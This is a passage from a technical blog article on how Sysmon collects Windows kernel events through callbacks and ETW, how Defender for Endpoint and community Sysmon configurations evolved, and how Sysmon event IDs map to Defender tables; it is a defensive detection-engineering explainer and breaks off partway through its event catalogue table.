&lt;p&gt;The architectural inflection landed in &lt;strong&gt;June 2023 with Sysmon v15&lt;/strong&gt;, when the Sysmon service began running as a protected process. BleepingComputer&apos;s contemporaneous coverage notes that the service ran as &lt;code&gt;PROTECTED_ANTIMALWARE_LIGHT&lt;/code&gt; and the schema bumped to 4.90 with the new &lt;code&gt;FileExecutableDetected&lt;/code&gt; event ID 29 [@bleepingcomputer-sysmon15][@hartong-sysmon15-medium]. The Microsoft Learn page now states the change verbatim: &quot;&lt;em&gt;The service runs as a protected process, thus disallowing a wide range of user mode interactions&lt;/em&gt;&quot; [@sysmon-ms-learn]. The latest published release at the time of writing is &lt;strong&gt;v15.2 on March 26, 2026&lt;/strong&gt; (per the Sysmon download page&apos;s &lt;em&gt;Published&lt;/em&gt; by-line), with twenty-nine event types plus EID 255 (Error) [@sysmon-ms-learn].&lt;/p&gt;
&lt;h3&gt;The MDE arc: March 2016 to late 2023&lt;/h3&gt;
&lt;p&gt;Microsoft announced &lt;strong&gt;Windows Defender Advanced Threat Protection&lt;/strong&gt; in a Windows Experience blog post on March 1, 2016 -- &lt;em&gt;&quot;Today, we announce the next step in our efforts to protect our enterprise customers, with a new service, Windows Defender Advanced Threat Protection&quot;&lt;/em&gt; [@ms-blog-atp-mar2016]. The service was framed as a cloud-correlated detection-and-investigation layer on top of the Windows 10 sensor, &quot;informed by anonymous information from over 1 billion Windows devices&quot; [@ms-blog-atp-mar2016]. The 2016 product was Windows-only, in-portal, and oriented to detection and investigation only.&lt;/p&gt;
&lt;p&gt;The Fall Creators Update in October 2017 broadened the product into prevention: &quot;&lt;em&gt;The Windows Fall Creators Update represents a new chapter in our product evolution as we offer a set of new prevention capabilities designed to stop attacks as they happen and before they have impact. This means that our service will expand beyond detection, investigation, and response, and will now allow companies to use the full power of the Windows security stack for preventative protection&lt;/em&gt;&quot; [@ms-blog-atp-jun2017]. Attack Surface Reduction rules, Exploit Guard, and Application Guard joined the platform. So did the &lt;strong&gt;Advanced Hunting&lt;/strong&gt; query surface in 2018 -- KQL on the same &lt;code&gt;Device*&lt;/code&gt; tables Maya uses in §1.&lt;/p&gt;
&lt;p&gt;The cross-platform reach arrived in March 2019 with macOS support (initially as Microsoft Defender ATP) and was extended to networked Linux and macOS discovery by February 2021 [@securityweek-defender-macos][@bleepingcomputer-defender-linux]. The product was renamed twice. The most-cited rename came at &lt;strong&gt;Microsoft Ignite 2020 on September 22, 2020&lt;/strong&gt;, when the Microsoft Security blog announced the product family rebrand: &quot;&lt;em&gt;Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection)&lt;/em&gt;&quot; [@ms-unified-siem-xdr-2020]. The same post renamed Microsoft Threat Protection to Microsoft 365 Defender, O365 ATP to Microsoft Defender for Office 365, and Azure ATP to Microsoft Defender for Identity. The second rename was at &lt;strong&gt;Microsoft Ignite 2023 in November 2023&lt;/strong&gt;, when Microsoft 365 Defender became &lt;strong&gt;Microsoft Defender XDR&lt;/strong&gt;, announced as part of the broader product rebrand at Ignite 2023 [@defender-xdr-ms-learn][@ms-ignite-2023-blog].The Ignite 2023 rebrand did not change the KQL substrate, the &lt;code&gt;Device*&lt;/code&gt; schema, or the Sentinel connector contract. It is a marketing relabel on top of a stable cloud surface. Detection engineering teams kept writing queries against &lt;code&gt;DeviceProcessEvents&lt;/code&gt; exactly as they did the day before the rename.&lt;/p&gt;
&lt;h3&gt;The configuration-lineage arc&lt;/h3&gt;
&lt;p&gt;A third arc ran in parallel with the two product arcs: the community-maintained Sysmon configurations that turned Sysmon from a kernel-callback publisher into a deployment-ready detection sensor.&lt;/p&gt;
&lt;p&gt;The historical root is &lt;strong&gt;SwiftOnSecurity&apos;s &lt;code&gt;sysmon-config&lt;/code&gt; repository&lt;/strong&gt;, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. The README&apos;s design intent is succinct: &quot;&lt;em&gt;This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing&lt;/em&gt;&quot; [@github-swiftonsecurity]. The repository remains the most-cited Sysmon-configuration starting point in the SOC industry.&lt;/p&gt;
&lt;p&gt;Florian Roth, working under the handle &lt;code&gt;@Neo23x0&lt;/code&gt;, forked SwiftOnSecurity&apos;s config in January 2018 (the exact creation date is now obscured by a 2021 rename -- see the sidenote below). The fork added blocking-rule support for Sysmon v14, an actively-maintained set of community pull-request merges, and the &lt;em&gt;export-block.xml&lt;/em&gt; variant that ships the v14+ FileBlockExecutable rules. The README states the lineage verbatim: &quot;&lt;em&gt;This is a forked and modified version of @SwiftOnSecurity&apos;s sysmon config. ... We merged most of the 30+ open pull requests&lt;/em&gt;&quot; [@github-neo23x0]. The current maintainer roster lists Florian Roth, Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali.&lt;/p&gt;
&lt;p&gt;Olaf Hartong&apos;s &lt;code&gt;sysmon-modular&lt;/code&gt; was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository takes a different design approach: instead of one monolithic XML config, Hartong ships a per-EID-and-per-technique module library that compiles down into one of several pre-generated artifacts -- &lt;code&gt;sysmonconfig.xml&lt;/code&gt; (default), &lt;code&gt;sysmonconfig-with-filedelete.xml&lt;/code&gt; (default plus archive), &lt;code&gt;sysmonconfig-excludes-only.xml&lt;/code&gt; (verbose), &lt;code&gt;sysmonconfig-research.xml&lt;/code&gt; (super-verbose, with the warning &quot;&lt;em&gt;really DO NOT USE IN PRODUCTION!&lt;/em&gt;&quot;), and the load-bearing &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt; whose entire design intent is to fill the gaps in Defender for Endpoint&apos;s collection surface [@github-hartong-modular].Olaf Hartong and Henri Hambartsumyan, the two FalconForce researchers who reverse-engineered Defender for Endpoint in 2022 and surfaced CVE-2022-23278, also maintain &lt;code&gt;olafhartong/sysmon-modular&lt;/code&gt;. This is the dual identity that makes the &lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt; config uniquely informed: the same people who learned where MDE&apos;s collection truncates Sysmon&apos;s manifest also published the config that fills those gaps [@falconforce-2022][@github-hartong-modular].&lt;/p&gt;
&lt;p&gt;The Neo23x0 repository was renamed in 2021. The current &lt;code&gt;https://github.com/Neo23x0/sysmon-config&lt;/code&gt; URL HTTP-301s to &lt;code&gt;https://github.com/NextronSystems/sysmon-config&lt;/code&gt;, and the GitHub REST API returns a &lt;code&gt;created_at&lt;/code&gt; of &lt;code&gt;2021-07-24T06:19:41Z&lt;/code&gt; with a &lt;code&gt;parent&lt;/code&gt; field pointing to &lt;code&gt;SwiftOnSecurity/sysmon-config&lt;/code&gt; [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; only the organizational owner moved from Florian Roth&apos;s personal handle to his employer Nextron Systems.&lt;/p&gt;
&lt;p&gt;By 2023, then, two product arcs and one configuration arc had converged on the same baseline: kernel callbacks (&lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt;, &lt;code&gt;ObRegisterCallbacks&lt;/code&gt;, &lt;code&gt;CmRegisterCallbackEx&lt;/code&gt;, Filter Manager minifilters) on the input side; an Antimalware-PPL protected service on the host; an ETW or TLS-pinned cloud transport in the middle; and KQL on &lt;code&gt;Device*&lt;/code&gt; tables on the reader side. The convergence was structural, not coincidental. To see why both arcs landed in the same place, we have to start at the kernel-callback boundary -- where Sysmon&apos;s input lives.&lt;/p&gt;
&lt;h2&gt;3. Sysmon Architecture: Kernel Collection, ETW Emission, Event Log Persistence&lt;/h2&gt;
&lt;p&gt;If you have ever read that Sysmon is an &quot;ETW-based event source,&quot; you have read something that is half-true. The half that is right is the &lt;em&gt;output&lt;/em&gt; side: Sysmon publishes its events through an ETW provider called &lt;code&gt;Microsoft-Windows-Sysmon&lt;/code&gt;, and the rest of the system -- including the Windows Event Log service -- subscribes to that provider. The half that is wrong is the &lt;em&gt;input&lt;/em&gt; side. Sysmon does not get most of its raw observations from ETW. It gets them from five kernel-callback families and one Filter Manager minifilter, with two narrow ETW-consumer exceptions (DNS-Client for EID 22; the WMI activity provider for EIDs 19-21).&lt;/p&gt;
&lt;p&gt;This distinction is small enough that most blog posts skip it and big enough that getting it wrong leads to architectural confusion. The split between &lt;em&gt;collection&lt;/em&gt; (how data enters the Sysmon driver) and &lt;em&gt;emission&lt;/em&gt; (how data leaves the Sysmon service) is the first thing to get straight before anything else makes sense.&lt;/p&gt;

The in-kernel, low-overhead, manifest-described tracing infrastructure built into Windows since 2000. Providers publish structured events; controllers start trace sessions and select which providers to enable; consumers receive events live or read them from `.etl` files. Sysmon uses ETW as its *output* bus -- its kernel driver hands events to the user-mode service via a private ETW session -- and as a small input source for the DNS-Client kernel provider (EID 22) and the WMI activity provider (EIDs 19-21).

A Microsoft-sanctioned ring-0 API for observing operating-system events without patching the System Service Descriptor Table. The Windows kernel exposes a small set of named callback APIs -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load (with a `SystemModeImage` bit that distinguishes kernel drivers from user-mode DLLs), `PsSetCreateThreadNotifyRoutineEx` for thread creation (with a remote-thread flag), `ObRegisterCallbacks` for handle-rights filtering against `PsProcessType` and `PsThreadType`, `CmRegisterCallbackEx` for registry operations, and the Filter Manager minifilter framework for file-system I/O. A driver registers a function pointer; the kernel invokes it on the corresponding event with the structured context. PatchGuard tolerates kernel callbacks; it does not tolerate SSDT patching [@wikipedia-kpp][@pssetcreateex-msdn][@ms-wdk-kernel-callbacks].

The file-system filter-driver framework (`FltMgr.sys`) that hosts minifilter drivers between the I/O manager and the file-system stack. Each minifilter declares an *altitude* (a 16-bit priority) and receives notifications for pre- and post-operation hooks on file create, file write, set-information, and set-security. Both `SysmonDrv.sys` and `WdFilter.sys` are minifilters; they coexist at different altitudes without colliding [@sysmon-ms-learn].
&lt;h3&gt;Five collection mechanisms, one ETW publisher&lt;/h3&gt;
&lt;p&gt;The Microsoft Learn page for Sysmon enumerates the event IDs and describes them at the &lt;em&gt;what&lt;/em&gt; level; the &lt;em&gt;how&lt;/em&gt; (which kernel API actually produced each event) is documented partly in the API references for each callback API and partly in the source code of Sysmon&apos;s open Linux port, &lt;code&gt;microsoft/SysmonForLinux&lt;/code&gt;, which reuses Sysinternals&apos; shared C++ rule-engine for parsing the same XML schema and translating it onto eBPF instead of kernel callbacks [@github-sysmon-linux][@sysmon-ms-learn]. The Windows port is closed source, but Sysinternals&apos; design has been documented enough -- across the RSA 2014 talk, the Diversenok 2022 reverse-engineering writeup, and the SysmonForLinux source -- that the collection-mechanism inventory is unambiguous.&lt;/p&gt;
&lt;p&gt;The five mechanisms are:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;th&gt;API or framework&lt;/th&gt;
&lt;th&gt;Sysmon EIDs produced&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Process-lifetime callback&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;1 (ProcessCreate), 5 (ProcessTerminate)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image-load callback&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PsSetLoadImageNotifyRoutine&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;7 (ImageLoad); 6 (DriverLoad, distinguished by the &lt;code&gt;IMAGE_INFO.SystemModeImage&lt;/code&gt; flag on the kernel-mode image)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Thread-creation callback&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PsSetCreateThreadNotifyRoutineEx&lt;/code&gt; (with the &lt;code&gt;PS_CREATE_THREAD_NOTIFY_FLAG_CREATE_REMOTE&lt;/code&gt; flag in &lt;code&gt;CREATE_THREAD_NOTIFY_INFO&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;8 (CreateRemoteThread)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Object Manager callback&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ObRegisterCallbacks&lt;/code&gt; against &lt;code&gt;PsProcessType&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;10 (ProcessAccess)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Registry callback&lt;/td&gt;
&lt;td&gt;&lt;code&gt;CmRegisterCallbackEx&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;12 (Registry Object Create/Delete), 13 (Registry Value Set), 14 (Registry Key/Value Rename)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Filter Manager minifilter&lt;/td&gt;
&lt;td&gt;&lt;code&gt;FltRegisterFilter&lt;/code&gt; against &lt;code&gt;FltCreate&lt;/code&gt;/&lt;code&gt;FltClose&lt;/code&gt;/&lt;code&gt;FltSetInformation&lt;/code&gt; -- ordinary file system, &lt;em&gt;and&lt;/em&gt; the Named Pipe File System (NPFS, &lt;code&gt;\Device\NamedPipe&lt;/code&gt;) at a different altitude&lt;/td&gt;
&lt;td&gt;11 (FileCreate), 15 (FileCreateStreamHash), 17 (PipeEvent Created), 18 (PipeEvent Connected), 23 (FileDelete archived), 26 (FileDeleteDetected), 27 (FileBlockExecutable), 28 (FileBlockShredding), 29 (FileExecutableDetected)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The five-mechanism framing collapses thread-creation and &lt;a href=&quot;https://paragmali.com/blog/the-object-manager-namespace/&quot; rel=&quot;noopener&quot;&gt;Object Manager&lt;/a&gt; callbacks into one architectural family (&quot;process and thread observation via Microsoft-sanctioned callbacks&quot;); a stricter count is six (process-lifetime, image-load, thread-creation, object-handle, registry, minifilter). Either count is defensible; what matters is keeping the API attribution honest: &lt;code&gt;PsSetCreateThreadNotifyRoutineEx&lt;/code&gt; is the canonical remote-thread observer, &lt;code&gt;ObRegisterCallbacks(PsProcessType)&lt;/code&gt; is the canonical handle-rights filter, and NPFS minifiltering -- not &lt;code&gt;ObRegisterCallbacks&lt;/code&gt; -- is what observes named-pipe creation and connection.&lt;/p&gt;
&lt;p&gt;The sixth source -- the &lt;strong&gt;ETW consumer&lt;/strong&gt; path -- is special. For DNS queries (EID 22), Sysmon does not register a kernel callback. It subscribes as a consumer of the Microsoft-published &lt;code&gt;Microsoft-Windows-DNS-Client&lt;/code&gt; ETW provider, parses the structured DNS events, and republishes them through its own ETW provider with the Sysmon enrichments applied [@sysmon-version-history]. DNS-Client is the only event Sysmon consumes from a Microsoft-published &lt;em&gt;kernel&lt;/em&gt; ETW provider; the WmiEvent family (EIDs 19-21) is implemented in a similar consumer style against the WMI activity provider&apos;s user-mode tracing surface, which is why the §4 catalogue marks those rows as &quot;WMI ETW provider consumer.&quot; Either way, ETW consumption is the input-side exception, not the rule: five kernel-callback families do the bulk of the work, and ETW is the input only for a small, deliberately-chosen set of events.The Sysmon ETW provider has the GUID &lt;code&gt;{5770385F-C22A-43E0-BF4C-06F5698FFBD9}&lt;/code&gt;. Microsoft Learn does not enumerate this GUID on the Sysmon page; the authoritative on-host discovery command is &lt;code&gt;logman query providers Microsoft-Windows-Sysmon&lt;/code&gt;, which returns the GUID, the keywords mask, and the registered processes. Pavel Yosifovich&apos;s community ETW-provider catalogue &lt;code&gt;EtwExplorer&lt;/code&gt; mirrors the value [@etwexplorer-sysmon-guid], with the on-host &lt;code&gt;logman&lt;/code&gt; command remaining the authority of last resort.&lt;/p&gt;
&lt;h3&gt;The ProcessCreate path, step by step&lt;/h3&gt;
&lt;p&gt;The clearest way to see how the pieces fit is to trace one event. Sysmon&apos;s process-create handling is the most-quoted EID in the manifest -- it is the EID that produces Maya&apos;s row in §1 -- and it follows the canonical kernel-callback pattern that Microsoft codified in &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;// Conceptual pseudocode for SysmonDrv&apos;s process-create path.
// Real Sysmon source for Windows is closed; the Linux port is open.
// This is the contract documented in the WDK reference for
// PsSetCreateProcessNotifyRoutineEx.

NTSTATUS SysmonDrvEntry(PDRIVER_OBJECT DriverObject, ...) {
    // 1. Register the create-process callback. PatchGuard tolerates this.
    PsSetCreateProcessNotifyRoutineEx(SysmonProcessCreateCb, FALSE);
    // ... other callbacks registered similarly ...
    return STATUS_SUCCESS;
}

VOID SysmonProcessCreateCb(
    HANDLE  ParentId,
    HANDLE  ProcessId,
    PPS_CREATE_NOTIFY_INFO  CreateInfo  // NULL on process exit
) {
    if (CreateInfo == NULL) {
        // Process exit: emit EID 5 (ProcessTerminate).
        SysmonEmitEventEID5(ProcessId);
        return;
    }
    // Process create. Apply the XML rule engine: does this process
    // match any &amp;lt;Include&amp;gt; rule, after evaluating &amp;lt;Exclude&amp;gt; overrides?
    if (!SysmonRuleMatch(EID_1, CreateInfo)) {
        return;  // Filtered: produce no event.
    }
    // Enrich with parent process, command line, image hash, integrity
    // level, user SID, ProcessGuid, and session identifiers, then ship
    // through the private Microsoft-Windows-Sysmon ETW publisher.
    SysmonEmitEventEID1(CreateInfo);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Four properties of the path matter. First, the callback is invoked &lt;strong&gt;synchronously&lt;/strong&gt; on the thread that issued the &lt;code&gt;CreateProcessW&lt;/code&gt; call, before the new process&apos;s first instruction runs; the parent and child PIDs are both known, but the new process has not yet executed any user-mode code. Second, the callback is &lt;strong&gt;rate-limited only by your rule engine&lt;/strong&gt; -- there is no built-in throttle, and a verbose &lt;code&gt;&amp;lt;Include&amp;gt;&lt;/code&gt; rule on a high-process-turnover host can saturate the ETW session. Third, the callback runs at &lt;strong&gt;IRQL = PASSIVE_LEVEL&lt;/strong&gt;, so it can do file I/O (which the driver needs for hashing) but it must do that I/O carefully to avoid deadlock on the very file system it is monitoring. Fourth, the Sysmon service runs as a separate user-mode process; if the service has crashed or been suspended, the driver continues to emit ETW events into a session with no listener and they evaporate.&lt;/p&gt;

Sysmon&apos;s per-process unique identifier, formatted as a 128-bit GUID and recorded as the `ProcessGuid` field on every event that names a process. Unlike a Windows process ID, the ProcessGuid survives PID reuse and uniquely identifies a process across its lifetime [@sysmon-ms-learn]; SOC tooling commonly joins on `(DeviceId, ProcessGuid)` to reconstruct process trees and avoid the PID-reuse race condition that plagues raw `ProcessId` joins.
&lt;h3&gt;Where the events go&lt;/h3&gt;
&lt;p&gt;Once the user-mode &lt;code&gt;Sysmon.exe&lt;/code&gt; service has labelled the event, it does two things. First, it writes the event to the Windows event log -- specifically to &lt;code&gt;Applications and Services Logs/Microsoft/Windows/Sysmon/Operational&lt;/code&gt; per Microsoft Learn&apos;s verbatim statement: &quot;&lt;em&gt;On Vista and higher, events are stored in &lt;code&gt;Applications and Services Logs/Microsoft/Windows/Sysmon/Operational&lt;/code&gt;&lt;/em&gt;&quot; [@sysmon-ms-learn]. Second, the same event is also visible to any ETW real-time consumer subscribed to &lt;code&gt;Microsoft-Windows-Sysmon&lt;/code&gt; -- which is how downstream collectors (Windows Event Forwarding, Splunk&apos;s universal forwarder, the Elastic Endpoint integration, Wazuh&apos;s Windows agent) actually pick the events up, rather than tailing the event log XML.&lt;/p&gt;

flowchart LR
    K1[&quot;PsSetCreateProcessNotifyRoutineEx&quot;] --&amp;gt; D[SysmonDrv.sys]
    K2[&quot;PsSetLoadImageNotifyRoutine&quot;] --&amp;gt; D
    K3[&quot;PsSetCreateThreadNotifyRoutineEx&quot;] --&amp;gt; D
    K4[&quot;ObRegisterCallbacks (PsProcessType)&quot;] --&amp;gt; D
    K5[&quot;CmRegisterCallbackEx&quot;] --&amp;gt; D
    K6[&quot;FltRegisterFilter (file system + NPFS)&quot;] --&amp;gt; D
    K7[&quot;ETW consumer: DNS-Client + WMI activity&quot;] --&amp;gt; D
    D --&amp;gt; P[&quot;ETW publisher: Microsoft-Windows-Sysmon&quot;]
    P --&amp;gt; S[Sysmon.exe service]
    S --&amp;gt; L[&quot;Applications and Services Logs / Microsoft / Windows / Sysmon / Operational&quot;]
    P --&amp;gt; R[&quot;Real-time ETW consumers (WEF, Splunk UF, Wazuh, Elastic)&quot;]
&lt;p&gt;This is the first aha moment. Sysmon is not &quot;ETW based&quot; in the way most blog posts imply. Sysmon is &lt;em&gt;a kernel driver that uses ETW as its IPC bus to user mode&lt;/em&gt;, and as a special-case consumer for one provider (DNS-Client). The reason Sysmon needed a kernel driver in the first place is that ETW alone could not see what the kernel callbacks see: ETW could not, in 2014, deliver a synchronous parent-PID-and-image-hash structure at process create time. Sysmon&apos;s driver does that work; ETW transports the result.&lt;/p&gt;
&lt;p&gt;The protected-process gate added in v15 (June 2023) closed the most-trivial blinding attack -- a SYSTEM-privilege process can no longer issue &lt;code&gt;OpenProcess(PROCESS_TERMINATE)&lt;/code&gt; against the Sysmon service to silence it. Raising the bar to a kernel-mode primitive does not eliminate the attack class, but it does change the cost model. The protected-process gate is the architectural inflection that distinguishes pre-v15 Sysmon (trivially blindable) from post-v15 Sysmon (requires a kernel primitive or a BYOVD chain) [@sysmon-ms-learn][@bleepingcomputer-sysmon15].&lt;/p&gt;
&lt;p&gt;Five collection mechanisms, one ETW publisher, one event log. That is the input side. Now the catalogue.&lt;/p&gt;
&lt;h2&gt;4. The Sysmon Event Catalogue: Twenty-Nine IDs and Their Version Gating&lt;/h2&gt;
&lt;p&gt;Run &lt;code&gt;sysmon -s&lt;/code&gt; on any v15.2 host and you get an XML schema enumerating twenty-nine event types plus EID 255 (Error). Every detection-engineering corpus in the field -- SwiftOnSecurity&apos;s config, Florian Roth&apos;s fork, Hartong&apos;s modular, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of this single schema [@sysmon-ms-learn][@github-sigma][@github-otrf-thp]. Learn the catalogue once and the rest of the Sysmon toolchain unfolds from it.&lt;/p&gt;
&lt;p&gt;A naming disambiguation is worth doing first, because the colloquial event names the field uses (and that the topic input for this article uses verbatim) differ from the canonical Microsoft Learn names. &quot;RegistrySet&quot; is a colloquial pun on &lt;code&gt;RegistryEvent (Value Set)&lt;/code&gt;, EID 13. &quot;DnsQuery&quot; is a colloquial shorthand for &lt;code&gt;DNSEvent (DNS query)&lt;/code&gt;, EID 22. &quot;NamedPipeConnect&quot; is two events at once: &lt;code&gt;PipeEvent (Pipe Created)&lt;/code&gt;, EID 17, and &lt;code&gt;PipeEvent (Pipe Connected)&lt;/code&gt;, EID 18. The article uses the canonical Microsoft Learn names from here on.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Sysmon&apos;s manifest names some events as a family with a parenthetical operation: &lt;code&gt;RegistryEvent (Object create and delete)&lt;/code&gt; (EID 12), &lt;code&gt;RegistryEvent (Value Set)&lt;/code&gt; (EID 13), &lt;code&gt;RegistryEvent (Key and Value Rename)&lt;/code&gt; (EID 14). The same pattern applies to the pipe events: &lt;code&gt;PipeEvent (Pipe Created)&lt;/code&gt; (EID 17) and &lt;code&gt;PipeEvent (Pipe Connected)&lt;/code&gt; (EID 18). When detection-rule tooling references &quot;EID 12-14&quot; or &quot;EID 17-18&quot;, these families are what it means. The colloquial single-name forms used elsewhere in the literature are not wrong; they are just less precise. The MDE schema does not preserve the parenthetical operation suffix; it surfaces these as &lt;code&gt;ActionType&lt;/code&gt; values inside &lt;code&gt;DeviceRegistryEvents&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The twenty-nine plus one catalogue&lt;/h3&gt;
&lt;p&gt;The catalogue groups naturally by the collection mechanism that produces each event:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;EID&lt;/th&gt;
&lt;th&gt;Canonical name&lt;/th&gt;
&lt;th&gt;Collection mechanism&lt;/th&gt;
&lt;th&gt;Introduced&lt;/th&gt;
&lt;th&gt;Maps to (MDE)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;ProcessCreate&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;v1.0 (Aug 2014)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceProcessEvents&lt;/code&gt; (&lt;code&gt;ProcessCreated&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;FileCreateTime&lt;/td&gt;
&lt;td&gt;Filter Manager&lt;/td&gt;
&lt;td&gt;v1.0 (Aug 2014)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceFileEvents&lt;/code&gt; (&lt;code&gt;FileCreated&lt;/code&gt;, partial)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;NetworkConnect&lt;/td&gt;
&lt;td&gt;Internal network-callout&lt;/td&gt;
&lt;td&gt;v1.0 (Aug 2014)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceNetworkEvents&lt;/code&gt; (&lt;code&gt;ConnectionSuccess&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;ServiceStateChange&lt;/td&gt;
&lt;td&gt;Sysmon-internal&lt;/td&gt;
&lt;td&gt;v1.0 (Aug 2014)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;ProcessTerminate&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;v1.0 (Aug 2014)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceProcessEvents&lt;/code&gt; (&lt;code&gt;ProcessTerminated&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;DriverLoad&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PsSetLoadImageNotifyRoutine&lt;/code&gt; (kernel-mode case via &lt;code&gt;IMAGE_INFO.SystemModeImage&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;v2.0 (2015)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceEvents&lt;/code&gt; (&lt;code&gt;DriverLoad&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;ImageLoad&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PsSetLoadImageNotifyRoutine&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;v2.0 (2015)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceImageLoadEvents&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;CreateRemoteThread&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PsSetCreateThreadNotifyRoutineEx&lt;/code&gt; (with &lt;code&gt;CREATE_REMOTE&lt;/code&gt; flag)&lt;/td&gt;
&lt;td&gt;v3.0 (2016)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceEvents&lt;/code&gt; (truncated)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;RawAccessRead&lt;/td&gt;
&lt;td&gt;&lt;code&gt;\Device\Harddisk*&lt;/code&gt; write filter&lt;/td&gt;
&lt;td&gt;v3.0 (2016)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;ProcessAccess&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ObRegisterCallbacks&lt;/code&gt; (PsProcessType)&lt;/td&gt;
&lt;td&gt;v6.0 (Feb 2017)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceEvents&lt;/code&gt; (GrantedAccess truncated)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;FileCreate&lt;/td&gt;
&lt;td&gt;Filter Manager&lt;/td&gt;
&lt;td&gt;v6.0 (Feb 2017)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceFileEvents&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;RegistryEvent (Object create/delete)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;CmRegisterCallbackEx&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;v6.0 (Feb 2017)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceRegistryEvents&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;RegistryEvent (Value Set)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;CmRegisterCallbackEx&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;v6.0 (Feb 2017)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceRegistryEvents&lt;/code&gt;&lt;/td&gt;
